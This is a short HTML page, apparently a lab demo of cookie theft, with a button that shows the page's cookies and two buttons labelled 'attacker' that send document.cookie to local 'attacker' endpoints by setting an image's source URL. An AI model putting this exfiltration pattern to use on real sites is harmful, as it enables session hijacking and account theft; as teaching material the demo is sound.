<html>
	<head><title>Wellcome</title></head>

	
	<script>
		function listCookies(){
			var theCookies=document.cookie.split(';');
			var aString='';
			for(var i=1; i<=theCookies.length; i++){
				aString += i + '-> ' + theCookies[i-1] + '  '
			}
			return aString;
		}
	</script>
	<body>
	
	<p><button onclick=alert(listCookies())>Click here to see the cookies.</button></p>
	
	<form>
		<input type="button" onclick="var image = document.getElementById('the-image'); image.src='http://127.0.0.1:8070/attacker?text=' + escape(document.cookie); return false;" value="attacker">
	</form>
	<img id="the-image">

	<form>
		<input type="button" onclick="var image = document.getElementById('the-image2'); image.src='http://localhost:8100/sdattacker?text=' + escape(document.cookie);" value="sdattacker">
	</form>
	<img id="the-image2">
	

	
	</body>
</html>




